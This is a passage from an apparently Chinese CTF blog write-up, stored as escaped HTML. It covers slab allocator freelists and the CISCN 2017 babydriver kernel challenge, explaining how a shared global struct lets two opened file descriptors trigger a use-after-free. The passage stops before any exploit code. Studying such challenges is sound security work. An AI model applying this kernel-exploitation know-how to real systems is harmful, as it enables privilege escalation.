object\uff09\u3001partial\uff08\u90e8\u5206\u7a7a\u95f2\uff09\u3001empty\uff08\u5168\u7a7a\u95f2\uff09\u4e09\u7c7b slab \u94fe\u8868\uff0c\u8d1f\u8d23 CPU \u672c\u5730\u7f13\u5b58\u7684\u8865\u5145\u4e0e\u5f52\u8fd8 \u2014\u2014 \u5f53 CPU \u672c\u5730 freelist \u65e0\u7a7a\u95f2\u5bf9\u8c61\u65f6\uff0c\u4f1a\u4ece\u8be5\u8282\u70b9\u7684 partial \u94fe\u8868\u4e2d\u6279\u91cf\u83b7\u53d6 object \u8865\u5145\uff1b\u5f53 CPU \u672c\u5730 freelist \u6ee1\u65f6\uff0c\u4f1a\u5c06\u591a\u4f59\u7a7a\u95f2 object \u6279\u91cf\u5f52\u8fd8\u7ed9\u8282\u70b9\u7684 slab \u94fe\u8868\u3002<\/p>\n\n\n\n<\/span>CTFSHOW 358(CISCN – 2017 – babydriver)<\/span><\/h3>\n\n\n\n<\/span>\u6f0f\u6d1e\u89e3\u6790<\/span><\/h4>\n\n\n\n\u4fdd\u62a4\uff1a\u5f00\u542fsmep\u4f46\u6ca1\u6709\u5f00\u542fsmap<\/p>\n\n\n\n
\u521d\u59cb\u6a21\u5757\u5982\u4e0b\uff0ccdev_init(&cdev, &fops);\u81ea\u5b9a\u4e49\u4e86\u4e00\u4e2a\u51fd\u6570\u8868fops\uff0c\u5bf9\/dev\/easydev\u8fdb\u884cread\u3001write\u7b49\u64cd\u4f5c\u7684\u65f6\u5019\u5c31\u4f1a\u91cd\u5b9a\u5411\u5230\u81ea\u5b9a\u4e49\u7684easyread\u3001easywrite\u4e0a\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
\u5176\u4e2d\u6240\u6709\u51fd\u6570\u90fd\u662f\u76f4\u63a5\u5bf9\u4e00\u4e2a\u5168\u5c40\u53d8\u91cfeasydev_struct\u8fdb\u884c\u64cd\u4f5c\uff0c\u6240\u4ee5<\/p>\n\n\n\n
int fd1 = open(“\/dev\/easydev”, 2);
int fd2 = open(“\/dev\/easydev”, 2);<\/p>\n\n\n\n
\u4f1a\u4f7f\u5f97\u4e24\u4e2afd\u53e5\u67c4\u5b9e\u9645\u4e0a\u5bf9\u540c\u4e00\u4e2a\u5730\u5740\u8fdb\u884c\u64cd\u4f5c\uff0c\u800c\u5728easyioctl\u548ceasyrelease\u51fd\u6570\u4e2d\u5b58\u5728UAF\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
<\/span>\u6f0f\u6d1e\u5229\u7528<\/span><\/h4>\n\n\n\n